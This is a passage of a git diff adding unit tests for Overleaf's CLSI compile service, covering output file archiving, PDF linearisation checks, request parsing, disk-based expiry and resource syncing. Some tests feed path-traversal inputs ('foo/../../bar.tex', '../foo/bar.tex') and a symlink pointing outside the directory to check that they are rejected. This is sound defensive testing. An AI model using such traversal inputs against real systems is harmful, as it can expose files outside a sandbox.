+ + describe('when one of the files is called output.pdf', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + { path: 'output.pdf' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('does not include that file in the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + }) + + describe('when the output directory cannot be accessed', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.rejects({ + code: 'ENOENT', + }) + }) + + it('rejects with a NotFoundError', async function () { + try { + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + assert.fail('should have thrown a NotFoundError') + } catch (err) { + expect(err).to.haveOwnProperty('name', 'NotFoundError') + } + }) + + it('does not create an archive', function () { + expect(this.archiver.called).to.be.false + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileFinderTests.js b/services/clsi/test/unit/js/OutputFileFinderTests.js new file mode 100644 index 0000000..c9e1b44 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileFinderTests.js @@ -0,0 +1,72 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/OutputFileFinder' +) +const { expect } = require('chai') +const mockFs = require('mock-fs') + +describe('OutputFileFinder', function () { + beforeEach(function () { + this.OutputFileFinder = SandboxedModule.require(modulePath, {}) + this.directory = '/test/dir' + this.callback = sinon.stub() + + mockFs({ + [this.directory]: { + resource: { + 'path.tex': 'a source file', + }, + 'output.pdf': 'a generated pdf file', + extra: { + 'file.tex': 'a generated tex file', + }, + 'sneaky-file': mockFs.symlink({ + path: '../foo', + }), + }, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('findOutputFiles', function () { + beforeEach(async function () { + this.resource_path = 'resource/path.tex' + this.output_paths = ['output.pdf', 'extra/file.tex'] + this.all_paths = this.output_paths.concat([this.resource_path]) + this.resources = [{ path: (this.resource_path = 'resource/path.tex') }] + const { outputFiles, allEntries } = + await this.OutputFileFinder.promises.findOutputFiles( + this.resources, + this.directory + ) + this.outputFiles = outputFiles + this.allEntries = allEntries + }) + + it('should only return the output files, not directories or resource paths', function () { + expect(this.outputFiles).to.have.deep.members([ + { + path: 'output.pdf', + type: 'pdf', + }, + { + path: 'extra/file.tex', + type: 'tex', + }, + ]) + expect(this.allEntries).to.deep.equal([ + 'extra/file.tex', + 'extra/', + 'output.pdf', + 'resource/path.tex', + 'resource/', + 'sneaky-file', + ]) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileOptimiserTests.js b/services/clsi/test/unit/js/OutputFileOptimiserTests.js new file mode 100644 index 0000000..1dd1a75 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileOptimiserTests.js @@ -0,0 +1,192 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/OutputFileOptimiser' +) +const path = require('node:path') +const { expect } = require('chai') +const { EventEmitter } = require('node:events') + +describe('OutputFileOptimiser', function () { + beforeEach(function () { + this.OutputFileOptimiser = SandboxedModule.require(modulePath, { + requires: { + fs: (this.fs = {}), + path: (this.Path = {}), + child_process: { spawn: (this.spawn = sinon.stub()) }, + './Metrics': {}, + }, + globals: { Math }, // used by lodash + }) + this.directory = '/test/dir' + return (this.callback = sinon.stub()) + }) + + describe('optimiseFile', function () { + beforeEach(function () { + this.src = './output.pdf' + return (this.dst = './output.pdf') + }) + + describe('when the file is not a pdf file', function () { + beforeEach(function (done) { + this.src = './output.log' + this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon + .stub() + .callsArgWith(1, null, false) + this.OutputFileOptimiser.optimisePDF = sinon + .stub() + .callsArgWith(2, null) + return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done) + }) + + it('should not check if the file is optimised', function () { + return this.OutputFileOptimiser.checkIfPDFIsOptimised + .calledWith(this.src) + .should.equal(false) + }) + + return it('should not optimise the file', function () { + return this.OutputFileOptimiser.optimisePDF + .calledWith(this.src, this.dst) + .should.equal(false) + }) + }) + + describe('when the pdf file is not optimised', function () { + beforeEach(function (done) { + this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon + .stub() + .callsArgWith(1, null, false) + this.OutputFileOptimiser.optimisePDF = sinon + .stub() + .callsArgWith(2, null) + return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done) + }) + + it('should check if the pdf is optimised', function () { + return this.OutputFileOptimiser.checkIfPDFIsOptimised + .calledWith(this.src) + .should.equal(true) + }) + + return it('should optimise the pdf', function () { + return this.OutputFileOptimiser.optimisePDF + .calledWith(this.src, this.dst) + .should.equal(true) + }) + }) + + return describe('when the pdf file is optimised', function () { + beforeEach(function (done) { + this.OutputFileOptimiser.checkIfPDFIsOptimised = sinon + .stub() + .callsArgWith(1, null, true) + this.OutputFileOptimiser.optimisePDF = sinon + .stub() + .callsArgWith(2, null) + return this.OutputFileOptimiser.optimiseFile(this.src, this.dst, done) + }) + + it('should check if the pdf is optimised', function () { + return this.OutputFileOptimiser.checkIfPDFIsOptimised + .calledWith(this.src) + .should.equal(true) + }) + + return it('should not optimise the pdf', function () { + return this.OutputFileOptimiser.optimisePDF + .calledWith(this.src, this.dst) + .should.equal(false) + }) + }) + }) + + return describe('checkIfPDFISOptimised', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.fd = 1234 + this.fs.open = sinon.stub().yields(null, this.fd) + this.fs.read = sinon + .stub() + .withArgs(this.fd) + .yields(null, 100, Buffer.from('hello /Linearized 1')) + this.fs.close = sinon.stub().withArgs(this.fd).yields(null) + return this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + describe('for a linearised file', function () { + beforeEach(function () { + this.fs.read = sinon + .stub() + .withArgs(this.fd) + .yields(null, 100, Buffer.from('hello /Linearized 1')) + return this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + it('should open the file', function () { + return this.fs.open.calledWith(this.src, 'r').should.equal(true) + }) + + it('should read the header', function () { + return this.fs.read.calledWith(this.fd).should.equal(true) + }) + + it('should close the file', function () { + return this.fs.close.calledWith(this.fd).should.equal(true) + }) + + return it('should call the callback with a true result', function () { + return this.callback.calledWith(null, true).should.equal(true) + }) + }) + + return describe('for an unlinearised file', function () { + beforeEach(function () { + this.fs.read = sinon + .stub() + .withArgs(this.fd) + .yields(null, 100, Buffer.from('hello not linearized 1')) + return this.OutputFileOptimiser.checkIfPDFIsOptimised( + this.src, + this.callback + ) + }) + + it('should open the file', function () { + return this.fs.open.calledWith(this.src, 'r').should.equal(true) + }) + + it('should read the header', function () { + return this.fs.read.calledWith(this.fd).should.equal(true) + }) + + it('should close the file', function () { + return this.fs.close.calledWith(this.fd).should.equal(true) + }) + + return it('should call the callback with a false result', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js b/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js new file mode 100644 index 0000000..4f42411 --- /dev/null +++ b/services/clsi/test/unit/js/ProjectPersistenceManagerTests.js @@ -0,0 +1,174 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const assert = require('chai').assert +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ProjectPersistenceManager' +) +const tk = require('timekeeper') + +describe('ProjectPersistenceManager', function () { + beforeEach(function () { + this.fsPromises = { + statfs: sinon.stub(), + } + + this.ProjectPersistenceManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': (this.Metrics = { gauge: sinon.stub() }), + './UrlCache': (this.UrlCache = {}), + './CompileManager': (this.CompileManager = {}), + fs: { promises: this.fsPromises }, + '@overleaf/settings': (this.settings = { + project_cache_length_ms: 1000, + path: { + compilesDir: '/compiles', + outputDir: '/output', + clsiCacheDir: '/cache', + }, + }), + }, + }) + this.callback = sinon.stub() + this.project_id = 'project-id-123' + return (this.user_id = '1234') + }) + + describe('refreshExpiryTimeout', function () { + it('should leave expiry alone if plenty of disk', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 40, + }) + + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 40 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal( + this.settings.project_cache_length_ms + ) + done() + }) + }) + + it('should drop EXPIRY_TIMEOUT 10% if low disk usage', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 5, + }) + + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 5 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(900) + done() + }) + }) + + it('should not drop EXPIRY_TIMEOUT to below 50% of project_cache_length_ms', function (done) { + this.fsPromises.statfs.resolves({ + blocks: 100, + bsize: 1, + bavail: 5, + }) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT = 500 + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.Metrics.gauge.should.have.been.calledWith( + 'disk_available_percent', + 5 + ) + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(500) + done() + }) + }) + + it('should not modify EXPIRY_TIMEOUT if there is an error getting disk values', function (done) { + this.fsPromises.statfs.rejects(new Error()) + this.ProjectPersistenceManager.refreshExpiryTimeout(() => { + this.ProjectPersistenceManager.EXPIRY_TIMEOUT.should.equal(1000) + done() + }) + }) + }) + + describe('clearExpiredProjects', function () { + beforeEach(function () { + this.project_ids = ['project-id-1', 'project-id-2'] + this.ProjectPersistenceManager._findExpiredProjectIds = sinon + .stub() + .callsArgWith(0, null, this.project_ids) + this.ProjectPersistenceManager.clearProjectFromCache = sinon + .stub() + .callsArg(2) + this.CompileManager.clearExpiredProjects = sinon.stub().callsArg(1) + return this.ProjectPersistenceManager.clearExpiredProjects(this.callback) + }) + + it('should clear each expired project', function () { + return Array.from(this.project_ids).map(projectId => + this.ProjectPersistenceManager.clearProjectFromCache + .calledWith(projectId) + .should.equal(true) + ) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('clearProject', function () { + beforeEach(function () { + this.ProjectPersistenceManager._clearProjectFromDatabase = sinon + .stub() + .callsArg(1) + this.UrlCache.clearProject = sinon.stub().callsArg(2) + this.CompileManager.clearProject = sinon.stub().callsArg(2) + return this.ProjectPersistenceManager.clearProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should clear the project from the database', function () { + return this.ProjectPersistenceManager._clearProjectFromDatabase + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should clear all the cached Urls for the project', function () { + return this.UrlCache.clearProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should clear the project compile folder', function () { + return this.CompileManager.clearProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/RequestParserTests.js b/services/clsi/test/unit/js/RequestParserTests.js new file mode 100644 index 0000000..437c3c4 --- /dev/null +++ b/services/clsi/test/unit/js/RequestParserTests.js @@ -0,0 +1,480 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/RequestParser' +) +const tk = require('timekeeper') + +describe('RequestParser', function () { + beforeEach(function () { + tk.freeze() + this.callback = sinon.stub() + this.validResource = { + path: 'main.tex', + date: '12:00 01/02/03', + content: 'Hello world', + } + this.validRequest = { + compile: { + token: 'token-123', + options: { + imageName: 'basicImageName/here:2017-1', + compiler: 'pdflatex', + timeout: 42, + }, + resources: [], + }, + } + this.RequestParser = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + './OutputCacheManager': { BUILD_REGEX: /^[0-9a-f]+-[0-9a-f]+$/ }, + }, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('without a top level object', function () { + beforeEach(function () { + this.RequestParser.parse([], this.callback) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.called + expect(this.callback.args[0][0].message).to.equal( + 'top level object should have a compile attribute' + ) + }) + }) + + describe('without a compile attribute', function () { + beforeEach(function () { + this.RequestParser.parse({}, this.callback) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.called + expect(this.callback.args[0][0].message).to.equal( + 'top level object should have a compile attribute' + ) + }) + }) + + describe('without a valid compiler', function () { + beforeEach(function () { + this.validRequest.compile.options.compiler = 'not-a-compiler' + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: + 'compiler attribute should be one of: pdflatex, latex, xelatex, lualatex', + }) + .should.equal(true) + }) + }) + + describe('without a compiler specified', function () { + beforeEach(function (done) { + delete this.validRequest.compile.options.compiler + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the compiler to pdflatex by default', function () { + this.data.compiler.should.equal('pdflatex') + }) + }) + + describe('with imageName set', function () { + beforeEach(function (done) { + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the imageName', function () { + this.data.imageName.should.equal('basicImageName/here:2017-1') + }) + }) + + describe('when image restrictions are present', function () { + beforeEach(function () { + this.settings.clsi = { docker: {} } + this.settings.clsi.docker.allowedImages = [ + 'repo/name:tag1', + 'repo/name:tag2', + ] + }) + + describe('with imageName set to something invalid', function () { + beforeEach(function () { + const request = this.validRequest + request.compile.options.imageName = 'something/different:latest' + this.RequestParser.parse(request, (error, data) => { + this.error = error + this.data = data + }) + }) + + it('should throw an error for imageName', function () { + expect(String(this.error)).to.include( + 'imageName attribute should be one of' + ) + }) + }) + + describe('with imageName set to something valid', function () { + beforeEach(function () { + const request = this.validRequest + request.compile.options.imageName = 'repo/name:tag1' + this.RequestParser.parse(request, (error, data) => { + this.error = error + this.data = data + }) + }) + + it('should set the imageName', function () { + this.data.imageName.should.equal('repo/name:tag1') + }) + }) + }) + + describe('with flags set', function () { + beforeEach(function (done) { + this.validRequest.compile.options.flags = ['-file-line-error'] + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the flags attribute', function () { + expect(this.data.flags).to.deep.equal(['-file-line-error']) + }) + }) + + describe('with flags not specified', function () { + beforeEach(function (done) { + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('it should have an empty flags list', function () { + expect(this.data.flags).to.deep.equal([]) + }) + }) + + describe('without a timeout specified', function () { + beforeEach(function (done) { + delete this.validRequest.compile.options.timeout + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the timeout to MAX_TIMEOUT', function () { + this.data.timeout.should.equal(this.RequestParser.MAX_TIMEOUT * 1000) + }) + }) + + describe('with a timeout larger than the maximum', function () { + beforeEach(function (done) { + this.validRequest.compile.options.timeout = + this.RequestParser.MAX_TIMEOUT + 1 + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the timeout to MAX_TIMEOUT', function () { + this.data.timeout.should.equal(this.RequestParser.MAX_TIMEOUT * 1000) + }) + }) + + describe('with a timeout', function () { + beforeEach(function (done) { + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should set the timeout (in milliseconds)', function () { + this.data.timeout.should.equal( + this.validRequest.compile.options.timeout * 1000 + ) + }) + }) + + describe('with a resource without a path', function () { + beforeEach(function () { + delete this.validResource.path + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: 'all resources should have a path attribute', + }) + .should.equal(true) + }) + }) + + describe('with a resource with a path', function () { + beforeEach(function () { + this.validResource.path = this.path = 'test.tex' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the path in the parsed response', function () { + this.data.resources[0].path.should.equal(this.path) + }) + }) + + describe('with a resource with a malformed modified date', function () { + beforeEach(function () { + this.validResource.modified = 'not-a-date' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: + 'resource modified date could not be understood: ' + + this.validResource.modified, + }) + .should.equal(true) + }) + }) + + describe('with a valid buildId', function () { + beforeEach(function (done) { + this.validRequest.compile.options.buildId = '195a4869176-a4ad60bee7bf35e4' + this.RequestParser.parse(this.validRequest, (error, data) => { + if (error) return done(error) + this.data = data + done() + }) + }) + + it('should return an error', function () { + this.data.buildId.should.equal('195a4869176-a4ad60bee7bf35e4') + }) + }) + + describe('with a bad buildId', function () { + beforeEach(function () { + this.validRequest.compile.options.buildId = 'foo/bar' + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: + 'buildId attribute does not match regex /^[0-9a-f]+-[0-9a-f]+$/', + }) + .should.equal(true) + }) + }) + + describe('with a resource with a valid date', function () { + beforeEach(function () { + this.date = '12:00 01/02/03' + this.validResource.modified = this.date + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the date as a Javascript Date object', function () { + ;(this.data.resources[0].modified instanceof Date).should.equal(true) + this.data.resources[0].modified + .getTime() + .should.equal(Date.parse(this.date)) + }) + }) + + describe('with a resource without either a content or URL attribute', function () { + beforeEach(function () { + delete this.validResource.url + delete this.validResource.content + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: + 'all resources should have either a url or content attribute', + }) + .should.equal(true) + }) + }) + + describe('with a resource where the content is not a string', function () { + beforeEach(function () { + this.validResource.content = [] + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'content attribute should be a string' }) + .should.equal(true) + }) + }) + + describe('with a resource where the url is not a string', function () { + beforeEach(function () { + this.validResource.url = [] + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'url attribute should be a string' }) + .should.equal(true) + }) + }) + + describe('with a resource with a url', function () { + beforeEach(function () { + this.validResource.url = this.url = 'www.example.com' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the url in the parsed response', function () { + this.data.resources[0].url.should.equal(this.url) + }) + }) + + describe('with a resource with a content attribute', function () { + beforeEach(function () { + this.validResource.content = this.content = 'Hello world' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the content in the parsed response', function () { + this.data.resources[0].content.should.equal(this.content) + }) + }) + + describe('without a root resource path', function () { + beforeEach(function () { + delete this.validRequest.compile.rootResourcePath + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it("should set the root resource path to 'main.tex' by default", function () { + this.data.rootResourcePath.should.equal('main.tex') + }) + }) + + describe('with a root resource path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = this.path = 'test.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the root resource path in the parsed response', function () { + this.data.rootResourcePath.should.equal(this.path) + }) + }) + + describe('with a root resource path that is not a string', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = [] + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: 'rootResourcePath attribute should be a string', + }) + .should.equal(true) + }) + }) + + describe('with a root resource path that has a relative path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = 'foo/../../bar.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'relative path in root resource' }) + .should.equal(true) + }) + }) + + describe('with a root resource path that has unescaped + relative path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = 'foo/../bar.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'relative path in root resource' }) + .should.equal(true) + }) + }) + + describe('with an unknown syncType', function () { + beforeEach(function () { + this.validRequest.compile.options.syncType = 'unexpected' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: 'syncType attribute should be one of: full, incremental', + }) + .should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ResourceStateManagerTests.js b/services/clsi/test/unit/js/ResourceStateManagerTests.js new file mode 100644 index 0000000..823c816 --- /dev/null +++ b/services/clsi/test/unit/js/ResourceStateManagerTests.js @@ -0,0 +1,241 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ResourceStateManager' +) +const Path = require('node:path') +const Errors = require('../../../app/js/Errors') + +describe('ResourceStateManager', function () { + beforeEach(function () { + this.ResourceStateManager = SandboxedModule.require(modulePath, { + singleOnly: true, + requires: { + fs: (this.fs = {}), + './SafeReader': (this.SafeReader = {}), + }, + }) + this.basePath = '/path/to/write/files/to' + this.resources = [ + { path: 'resource-1-mock' }, + { path: 'resource-2-mock' }, + { path: 'resource-3-mock' }, + ] + this.state = '1234567890' + this.resourceFileName = `${this.basePath}/.project-sync-state` + this.resourceFileContents = `${this.resources[0].path}\n${this.resources[1].path}\n${this.resources[2].path}\nstateHash:${this.state}` + return (this.callback = sinon.stub()) + }) + + describe('saveProjectState', function () { + beforeEach(function () { + return (this.fs.writeFile = sinon.stub().callsArg(2)) + }) + + describe('when the state is specified', function () { + beforeEach(function () { + return this.ResourceStateManager.saveProjectState( + this.state, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should write the resource list to disk', function () { + return this.fs.writeFile + .calledWith(this.resourceFileName, this.resourceFileContents) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the state is undefined', function () { + beforeEach(function () { + this.state = undefined + this.fs.unlink = sinon.stub().callsArg(1) + return this.ResourceStateManager.saveProjectState( + this.state, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should unlink the resource file', function () { + return this.fs.unlink + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + it('should not write the resource list to disk', function () { + return this.fs.writeFile.called.should.equal(false) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + }) + + describe('checkProjectStateMatches', function () { + describe('when the state matches', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .callsArgWith(3, null, this.resourceFileContents) + return this.ResourceStateManager.checkProjectStateMatches( + this.state, + this.basePath, + this.callback + ) + }) + + it('should read the resource file', function () { + return this.SafeReader.readFile + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + return it('should call the callback with the results', function () { + return this.callback + .calledWithMatch(null, this.resources) + .should.equal(true) + }) + }) + + describe('when the state file is not present', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon.stub().callsArg(3) + return this.ResourceStateManager.checkProjectStateMatches( + this.state, + this.basePath, + this.callback + ) + }) + + it('should read the resource file', function () { + return this.SafeReader.readFile + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('invalid state for incremental update') + }) + }) + + return describe('when the state does not match', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .callsArgWith(3, null, this.resourceFileContents) + return this.ResourceStateManager.checkProjectStateMatches( + 'not-the-original-state', + this.basePath, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('invalid state for incremental update') + }) + }) + }) + + return describe('checkResourceFiles', function () { + describe('when all the files are present', function () { + beforeEach(function () { + this.allFiles = [ + this.resources[0].path, + this.resources[1].path, + this.resources[2].path, + ] + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + this.callback + ) + }) + + return it('should call the callback', function () { + return this.callback.calledWithExactly().should.equal(true) + }) + }) + + describe('when there is a missing file', function () { + beforeEach(function () { + this.allFiles = [this.resources[0].path, this.resources[1].path] + this.fs.stat = sinon.stub().callsArgWith(1, new Error()) + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include( + 'resource files missing in incremental update' + ) + }) + }) + + return describe('when a resource contains a relative path', function () { + beforeEach(function () { + this.resources[0].path = '../foo/bar.tex' + this.allFiles = [ + this.resources[0].path, + this.resources[1].path, + this.resources[2].path, + ] + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('relative path in resource file list') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ResourceWriterTests.js b/services/clsi/test/unit/js/ResourceWriterTests.js new file mode 100644 index 0000000..c2e09ce --- /dev/null +++ b/services/clsi/test/unit/js/ResourceWriterTests.js @@ -0,0 +1,532 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ResourceWriter' +) +const path = require('node:path') + +describe('ResourceWriter', function () { + beforeEach(function () { + let Timer + this.ResourceWriter = SandboxedModule.require(modulePath, { + singleOnly: true, + requires: { + fs: (this.fs = { + mkdir: sinon.stub().callsArg(1), + unlink: sinon.stub().callsArg(1), + }), + './ResourceStateManager': (this.ResourceStateManager = {}), + './UrlCache': (this.UrlCache = { + createProjectDir: sinon.stub().yields(), + }), + './OutputFileFinder': (this.OutputFileFinder = {}), + './Metrics': (this.Metrics = { + inc: sinon.stub(), + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + this.basePath = '/path/to/write/files/to' + return (this.callback = sinon.stub()) + }) + + describe('syncResourcesToDisk on a full request', function () { + beforeEach(function () { + this.resources = ['resource-1-mock', 'resource-2-mock', 'resource-3-mock'] + this.request = { + project_id: this.project_id, + syncState: (this.syncState = '0123456789abcdef'), + resources: this.resources, + } + this.ResourceWriter._writeResourceToDisk = sinon.stub().callsArg(3) + this.ResourceWriter._removeExtraneousFiles = sinon.stub().yields(null) + this.ResourceStateManager.saveProjectState = sinon.stub().callsArg(3) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + 